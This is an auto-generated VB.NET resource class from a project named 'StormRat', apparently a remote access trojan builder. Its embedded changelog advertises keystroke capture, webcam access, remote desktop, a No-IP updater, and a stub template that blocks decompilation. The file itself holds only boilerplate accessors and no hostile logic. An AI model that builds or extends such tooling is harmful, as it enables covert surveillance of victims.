'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.239
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("StormRat.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        Friend ReadOnly Property Archiver() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("Archiver", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System, System.Reflection, System.Windows.Forms, Microsoft.VisualBasic, System.IO, System.Diagnostics
        '''
        '''&lt;Assembly: Runtime.CompilerServices.SuppressIldasm()&gt; 
        '''&lt;Assembly: AssemblyTitle(&quot;*Title*&quot;)&gt; 
        '''&lt;Assembly: AssemblyCompany(&quot;*Company*&quot;)&gt; 
        '''&lt;Assembly: AssemblyProduct(&quot;*Product*&quot;)&gt; 
        '''&lt;Assembly: AssemblyCopyright(&quot;*Copyright*&quot;)&gt; 
        '''&lt;Assembly: AssemblyTrademark(&quot;*Trademark*&quot;)&gt; 
        '''&lt;Assembly: AssemblyFileVersion(&quot;*Version*&quot;)&gt; 
        '''
        '''Module Module1
        '''    Dim q12p As Boolean = False, q13p As Boolean = False, q [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Source() As String
            Get
                Return ResourceManager.GetString("Source", resourceCulture)
            End Get
        End Property
        
        Friend ReadOnly Property StormServer() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("StormServer", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to ---------------------StormRat 2.0---------------------
        '''- New name and theme
        '''- Uses Codedom method instead of EOF method
        '''- Remote Desktop includes remote keyboard
        '''- Webcam speed enhanced
        '''- File Manager includes quick access
        '''- Fixed small file manager bug
        '''- Fixed keystroke capture bug
        '''- Fixed bug when saving settings
        '''- Fixed a small profile bug
        '''- No-IP Updater included.
        '''</summary>
        Friend ReadOnly Property Updates() As String
            Get
                Return ResourceManager.GetString("Updates", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
